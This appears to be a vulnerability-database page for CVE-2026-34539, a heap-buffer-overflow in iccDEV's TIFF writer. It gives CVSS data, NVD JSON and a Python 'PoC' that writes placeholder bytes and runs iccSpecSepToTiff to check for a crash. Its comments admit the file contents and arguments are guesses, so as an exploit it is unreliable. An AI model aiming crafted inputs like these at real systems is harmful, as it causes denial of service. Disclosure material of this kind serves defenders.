Security Vulnerability Report
中文
CVE-2026-34539 CVSS 6.2 MEDIUM

CVE-2026-34539

Published: 2026-03-31 22:16:21
Last Modified: 2026-04-20 13:52:57
Source: [email protected]

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile and TIFF input can trigger a heap-buffer-overflow (HBO) in CTiffImg::WriteLine(). The issue is observable under AddressSanitizer as an out-of-bounds heap read when running iccSpecSepToTiff on a malicious .icc + .tif pair, leading to a crash during TIFF strip writing. This issue has been patched in version 2.3.1.6.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-34539 (iccDEV Heap Buffer Overflow) This script demonstrates how to trigger the crash using the vulnerable tool. """ import os import subprocess # Configuration VULNERABLE_TOOL = "iccSpecSepToTiff" # Assume tool is in PATH MALICIOUS_ICC = "exploit.icc" MALICIOUS_TIF = "trigger.tif" def generate_malicious_files(): # In a real exploitation, these files contain specific binary patterns. # This is a placeholder for file generation logic. with open(MALICIOUS_ICC, 'wb') as f: f.write(b'Malicious_ICC_Profile_Header...') with open(MALICIOUS_TIF, 'wb') as f: f.write(b'Malicious_TIFF_Data...') print(f"[+] Generated {MALICIOUS_ICC} and {MALICIOUS_TIF}") def trigger_vulnerability(): if not os.path.exists(VULNERABLE_TOOL): print(f"[-] Tool {VULNERABLE_TOOL} not found.") return try: # Execute the command that triggers HBO in CTiffImg::WriteLine() # Command syntax based on typical usage: iccSpecSepToTiff input.icc output.tif # Adjust arguments based on actual tool usage if available. cmd = [VULNERABLE_TOOL, MALICIOUS_ICC, MALICIOUS_TIF] print(f"[*] Running: {' '.join(cmd)}") result = subprocess.run(cmd, capture_output=True, text=True, timeout=5) if result.returncode != 0: print(f"[+] Crashed! Return code: {result.returncode}") print(f"Error output:\n{result.stderr}") else: print("[-] Tool did not crash.") except subprocess.TimeoutExpired: print("[+] Process hung/timed out (potential DoS)") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": generate_malicious_files() trigger_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34539", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:21.447", "lastModified": "2026-04-20T13:52:57.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile and TIFF input can trigger a heap-buffer-overflow (HBO) in CTiffImg::WriteLine(). The issue is observable under AddressSanitizer as an out-of-bounds heap read when running iccSpecSepToTiff on a malicious .icc + .tif pair, leading to a crash during TIFF strip writing. This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, un perfil ICC manipulado y una entrada TIFF pueden desencadenar un desbordamiento de búfer de pila (HBO) en CTiffImg::WriteLine(). El problema es observable bajo AddressSanitizer como una lectura de pila fuera de límites al ejecutar iccSpecSepToTiff en un par malicioso de .icc + .tif, provocando un fallo durante la escritura de tiras TIFF. Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/672", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/686", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4f3j-q8mm-5hr6", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.